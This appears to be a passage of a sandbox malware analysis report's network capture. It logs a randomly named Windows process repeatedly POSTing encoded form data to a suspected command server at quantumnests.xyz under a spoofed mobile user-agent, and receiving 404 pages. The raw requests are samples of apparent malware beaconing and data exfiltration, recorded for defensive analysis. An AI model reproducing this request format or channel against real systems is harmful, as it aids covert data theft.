                  Sep 14, 2024 11:12:45.824719906 CEST1236INData Raw: 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 33 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 32 30
                  Data Ascii: <path class="st2" d="M230 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M220 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M210 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M200 282.4h-3l-6.8 25.2h3z"/> <path class="st


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  22192.168.2.449759162.0.239.141803272C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
                  TimestampBytes transferredDirectionData
                  Sep 14, 2024 11:12:47.771934032 CEST804OUTPOST /vnd3/ HTTP/1.1
                  Host: www.quantumnests.xyz
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US
                  Connection: close
                  Content-Length: 219
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: no-cache
                  Origin: http://www.quantumnests.xyz
                  Referer: http://www.quantumnests.xyz/vnd3/
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Data Raw: 67 64 3d 38 61 70 48 36 47 76 48 6c 49 67 68 39 43 77 55 41 53 79 7a 69 73 39 67 6d 35 6c 6c 68 50 6e 49 79 48 50 4e 71 34 6a 71 69 7a 74 43 55 69 57 67 31 75 63 78 47 78 43 7a 38 6e 32 63 6d 6d 79 42 45 51 35 74 39 65 76 6b 35 30 43 69 2f 79 5a 43 55 5a 64 65 51 6c 68 56 68 59 52 31 66 45 70 58 44 74 66 64 64 6c 70 75 4f 50 55 42 69 62 4a 52 6e 77 47 31 4f 2b 64 7a 2f 38 6d 37 59 57 73 46 31 47 79 2f 59 31 39 58 59 6d 63 44 4e 64 62 41 77 34 2f 45 6f 6b 6d 49 63 79 76 43 66 47 39 7a 59 2f 33 30 30 45 74 4a 66 4b 64 48 7a 63 33 71 78 36 35 71 66 70 53 6c 6f 51 4a 58 7a 38 5a 76 6e 31 58 44 67 67 44 4b 79 55 54 4b 65 34 44 78 41 71 31 42 73 4b 4d 3d
                  Data Ascii: gd=8apH6GvHlIgh9CwUASyzis9gm5llhPnIyHPNq4jqiztCUiWg1ucxGxCz8n2cmmyBEQ5t9evk50Ci/yZCUZdeQlhVhYR1fEpXDtfddlpuOPUBibJRnwG1O+dz/8m7YWsF1Gy/Y19XYmcDNdbAw4/EokmIcyvCfG9zY/300EtJfKdHzc3qx65qfpSloQJXz8Zvn1XDggDKyUTKe4DxAq1BsKM=
                  Sep 14, 2024 11:12:48.348790884 CEST1236INHTTP/1.1 404 Not Found
                  Date: Sat, 14 Sep 2024 09:12:48 GMT
                  Server: Apache
                  Content-Length: 18121
                  Connection: close
                  Content-Type: text/html
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="/404style.css"></head><body>... partial:index.partial.html --><div class="main"> <div> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1000 355"> <g id="ocean"> <path id="sky" class="st0" d="M0 0h1000v203.1H0z"/> <linearGradient id="water_1_" gradientUnits="userSpaceOnUse" x1="500" y1="354" x2="500" y2="200.667"> <stop offset="0" stop-color="#fff"/> <stop offset="1" stop-color="#b3dcdf"/> </linearGradient> <path id="water" fill="url(#water_1_)" d="M0 200.7h1000V354H0z"/> <path id="land" class="st0" d="M0 273.4h1000V354H0z"/> <g id="bumps"> <path class="st0" d="M0 275.2s83.8-28 180-28 197 28 197 28H0z"/> <path class="st0" d="M377 275.2s54.7-28 117.5-28 128.6 28 128.6 28H377z"/> <path class="st0" d="M623.2 275.2s83.7-28 179.9-28 196.9 28 196.9 28H623.2z"/> <path class="st0" d="M-998 275.2s83.8-28 180 [TRUNCATED]
                  Sep 14, 2024 11:12:48.348839998 CEST1236INData Raw: 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 2d 36 32 31 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 2d 33 37 34 2e 38 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31
                  Data Ascii: 5-28 128.6 28 128.6 28H-621z"/> <path class="st0" d="M-374.8 275.2s83.7-28 179.9-28S2 275.2 2 275.2h-376.8z"/> </g> </g> <g id="tracks"> <path class="st2" d="M9.8 282.4h-3L0 307.6h3z"/> <path class="st2" d="M19.8 282.4h-3
                  Sep 14, 2024 11:12:48.348855019 CEST1236INData Raw: 22 4d 31 39 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 30 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e
                  Data Ascii: "M199.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M209.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M219.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M229.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M239.8 282.4h-
                  Sep 14, 2024 11:12:48.348875999 CEST1236INData Raw: 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 31 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 32 39 2e 38
                  Data Ascii: ath class="st2" d="M419.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M429.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M439.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M449.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2"
                  Sep 14, 2024 11:12:48.348891020 CEST1236INData Raw: 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 38 37 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 38 36 30 20 32 38 32 2e 34 68 2d 33 6c 2d
                  Data Ascii: ss="st2" d="M870 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M860 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M850 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M840 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M830 282.4h
                  Sep 14, 2024 11:12:48.348903894 CEST1236INData Raw: 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 36 34 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63
                  Data Ascii: -6.8 25.2h3z"/> <path class="st2" d="M640 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M630 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M620 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M610 282.4h-3l-6.8 25.2h3z"/> <pa
                  Sep 14, 2024 11:12:48.348917961 CEST1236INData Raw: 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 33 37 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22
                  Data Ascii: /> <path class="st2" d="M-370.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-360.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-350.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-340.2 282.4h-3l-6.8 25.2h3z"/>
                  Sep 14, 2024 11:12:48.348932028 CEST1000INData Raw: 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 31 36 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33
                  Data Ascii: 2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-160.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-150.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-140.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-130.2 2
                  Sep 14, 2024 11:12:48.348948002 CEST1236INData Raw: 22 20 64 3d 22 4d 2d 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 35 30 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32
                  Data Ascii: " d="M-.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M500 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M490 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M480 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M470 282.4
                  Sep 14, 2024 11:12:48.348963022 CEST792INData Raw: 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 39 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32
                  Data Ascii: <path class="st2" d="M290 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M280 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M270 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M260 282.4h-3l-6.8 25.2h3z"/> <path class="
                  Sep 14, 2024 11:12:48.353954077 CEST1236INData Raw: 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 31 35 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22
                  Data Ascii: > <path class="st2" d="M150 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M140 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M130 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M120 282.4h-3l-6.8 25.2h3z"/> <path c


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  23192.168.2.449760162.0.239.141803272C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
                  TimestampBytes transferredDirectionData
                  Sep 14, 2024 11:12:50.321208954 CEST10886OUTPOST /vnd3/ HTTP/1.1
                  Host: www.quantumnests.xyz
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US
                  Connection: close
                  Content-Length: 10299
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: no-cache
                  Origin: http://www.quantumnests.xyz
                  Referer: http://www.quantumnests.xyz/vnd3/
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Data Raw: 67 64 3d 38 61 70 48 36 47 76 48 6c 49 67 68 39 43 77 55 41 53 79 7a 69 73 39 67 6d 35 6c 6c 68 50 6e 49 79 48 50 4e 71 34 6a 71 69 7a 31 43 56 51 65 67 6e 39 45 78 48 78 43 7a 2f 6e 32 66 6d 6d 79 51 45 51 68 70 39 66 54 53 35 78 47 69 2b 55 56 43 42 59 64 65 61 6c 68 56 73 34 52 6f 43 30 70 34 44 73 7a 5a 64 68 4e 75 4f 50 55 42 69 64 74 52 67 69 2b 31 4d 2b 64 38 2b 38 6d 6e 53 32 73 68 31 47 62 43 59 31 35 59 59 58 38 44 4e 39 72 41 78 4f 44 45 71 45 6d 4b 66 79 76 4b 66 47 68 73 59 2f 36 4e 30 46 5a 77 66 4e 74 48 79 35 79 44 6c 62 45 79 64 5a 4b 30 32 51 52 50 38 65 38 6a 6b 6e 54 4a 76 78 66 46 67 56 66 6f 59 71 7a 30 59 72 63 46 77 64 45 61 59 30 74 54 6d 43 70 74 48 43 56 6e 4a 65 67 33 67 7a 54 31 2f 30 30 71 66 49 61 42 2b 6e 36 61 44 39 70 33 53 73 4a 44 45 78 74 4c 6a 63 79 4d 38 39 4c 4c 45 48 59 68 56 6c 72 4c 75 59 69 6e 49 43 71 70 2f 34 6e 55 57 52 41 51 4d 39 6b 6e 67 78 70 66 34 6d 67 61 6a 4c 47 6c 46 72 36 50 7a 59 6e 75 53 6a 62 64 74 66 78 56 54 71 48 54 71 67 34 33 53 55 2f [TRUNCATED]
                  Data Ascii: gd=8apH6GvHlIgh9CwUASyzis9gm5llhPnIyHPNq4jqiz1CVQegn9ExHxCz/n2fmmyQEQhp9fTS5xGi+UVCBYdealhVs4RoC0p4DszZdhNuOPUBidtRgi+1M+d8+8mnS2sh1GbCY15YYX8DN9rAxODEqEmKfyvKfGhsY/6N0FZwfNtHy5yDlbEydZK02QRP8e8jknTJvxfFgVfoYqz0YrcFwdEaY0tTmCptHCVnJeg3gzT1/00qfIaB+n6aD9p3SsJDExtLjcyM89LLEHYhVlrLuYinICqp/4nUWRAQM9kngxpf4mgajLGlFr6PzYnuSjbdtfxVTqHTqg43SU/9ndN5jKd1UcNGiChLTxgsS9YM4DV1q9XurgrobanSxWGrlJNTSIS5EOwoBsjtaRJmNr8pnFPf/EAyZbIyhVE4YkP8+XNpc44o9v+Rp6qLz9pnKjTYCxwoTp/DEQLqN71028JH4Gd1hzs5cARj3LeD5rjN2eqccJN5SrOYAx/b/KFH+VspJSyvKjnLVK9PdoiEwLTX7dLtXKDIEvNxLeZ3bZ4yHnSTftbMlT/GDrE93lOyAS/znUsflbV3mb54ZH7Uo6RNZ2bcadjscXmtrPkEbLNQUvEsbbRadh+0beDdqJwZkf9LWJzELiLoo3ThGP0NcL9O4BcfNyAPsd1ncAElc+sGGuAc/qD1RF02Opr02z2aP+ryzgjckOulRrHQAW/+PPFmo4uCCfNrbbP2JvJhdDM+1ENz2Wts15sTbGdrtokPhn/uqepAM8pxWbK3e9ncyqIHUcwCeP9YE02KjVNQ00SexDOiG5FOSlMac+QhWWZgCFwJ0oOKXPRSYM2vc6W1dogdHaXsRyHc14W4JuKt0JTw4r+mpz0xPklPrg1k8Iho3CL5rkLteFAglm0S7rHCVEiQm7U5kTZz/pp9NnmHymzUwrtxAa445BNk6C8Wl4yPP2b1l++hpAL5TvpF18hTV9HzlwU5scuJorhVmmgtpTShwYgmaC0q5 [TRUNCATED]
                  Sep 14, 2024 11:12:50.939414978 CEST1236INHTTP/1.1 404 Not Found
                  Date: Sat, 14 Sep 2024 09:12:50 GMT
                  Server: Apache
                  Content-Length: 18121
                  Connection: close
                  Content-Type: text/html
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="/404style.css"></head><body>... partial:index.partial.html --><div class="main"> <div> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1000 355"> <g id="ocean"> <path id="sky" class="st0" d="M0 0h1000v203.1H0z"/> <linearGradient id="water_1_" gradientUnits="userSpaceOnUse" x1="500" y1="354" x2="500" y2="200.667"> <stop offset="0" stop-color="#fff"/> <stop offset="1" stop-color="#b3dcdf"/> </linearGradient> <path id="water" fill="url(#water_1_)" d="M0 200.7h1000V354H0z"/> <path id="land" class="st0" d="M0 273.4h1000V354H0z"/> <g id="bumps"> <path class="st0" d="M0 275.2s83.8-28 180-28 197 28 197 28H0z"/> <path class="st0" d="M377 275.2s54.7-28 117.5-28 128.6 28 128.6 28H377z"/> <path class="st0" d="M623.2 275.2s83.7-28 179.9-28 196.9 28 196.9 28H623.2z"/> <path class="st0" d="M-998 275.2s83.8-28 180 [TRUNCATED]
                  Sep 14, 2024 11:12:50.939429998 CEST1236INData Raw: 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 2d 36 32 31 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 2d 33 37 34 2e 38 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31
                  Data Ascii: 5-28 128.6 28 128.6 28H-621z"/> <path class="st0" d="M-374.8 275.2s83.7-28 179.9-28S2 275.2 2 275.2h-376.8z"/> </g> </g> <g id="tracks"> <path class="st2" d="M9.8 282.4h-3L0 307.6h3z"/> <path class="st2" d="M19.8 282.4h-3
                  Sep 14, 2024 11:12:50.939439058 CEST448INData Raw: 22 4d 31 39 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 30 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e
                  Data Ascii: "M199.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M209.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M219.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M229.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M239.8 282.4h-
                  Sep 14, 2024 11:12:50.939448118 CEST1236INData Raw: 22 73 74 32 22 20 64 3d 22 4d 32 37 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 38 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c
                  Data Ascii: "st2" d="M279.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M289.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M299.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M309.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M319.8
                  Sep 14, 2024 11:12:50.939457893 CEST1236INData Raw: 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 39 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64
                  Data Ascii: > <path class="st2" d="M499.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M1000 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M990 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M980 282.4h-3l-6.8 25.2h3z"/> <path class="s
                  Sep 14, 2024 11:12:50.939469099 CEST1236INData Raw: 20 64 3d 22 4d 37 39 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 37 38 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32
                  Data Ascii: d="M790 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M780 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M770 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M760 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M750 282.4h-3l-6.8
                  Sep 14, 2024 11:12:50.939479113 CEST1236INData Raw: 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 35 36 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 3c 70 61 74 68
                  Data Ascii: 2h3z"/> <path class="st2" d="M560 282.4h-3l-6.8 25.2h3z"/> <g> <path class="st2" d="M-490.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-480.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-470.2 282.4h-3l-6.8 25.
                  Sep 14, 2024 11:12:50.939496040 CEST328INData Raw: 3d 22 4d 2d 33 30 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 32 39 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e
                  Data Ascii: ="M-300.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-290.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-280.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-270.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M
                  Sep 14, 2024 11:12:50.939506054 CEST1236INData Raw: 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 32 34 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61
                  Data Ascii: h3z"/> <path class="st2" d="M-240.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-230.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-220.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-210.2 282.4h-3l-6.8 25.2h3z
                  Sep 14, 2024 11:12:50.939589977 CEST1236INData Raw: 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 33 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f
                  Data Ascii: 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-30.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-20.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-10.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-.2 282.4h-3l
                  Sep 14, 2024 11:12:50.944468021 CEST1236INData Raw: 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 33 33 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 33 32 30 20 32
                  Data Ascii: ath class="st2" d="M330 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M320 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M310 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M300 282.4h-3l-6.8 25.2h3z"/> <path class="st2"


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  24192.168.2.449761162.0.239.141803272C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
                  TimestampBytes transferredDirectionData
                  Sep 14, 2024 11:12:52.866863966 CEST514OUTGET /vnd3/?gd=xYBn5zztkuVfiCwnPAPX5/Vc6KcZvMqR03XK+4rS3g0RcyLb68RvZiy9qVH4+ViXNRgW3ur8wHahmEpIZ6ERXhxrpvJyNz8FMq3GCQE2JNk4pLMM9VfXXZw=&a0=_6Edzvj0xtFLdH HTTP/1.1
                  Host: www.quantumnests.xyz
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Language: en-US
                  Connection: close
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Sep 14, 2024 11:12:53.457520008 CEST1236INHTTP/1.1 404 Not Found
                  Date: Sat, 14 Sep 2024 09:12:53 GMT
                  Server: Apache
                  Content-Length: 18121
                  Connection: close
                  Content-Type: text/html; charset=utf-8
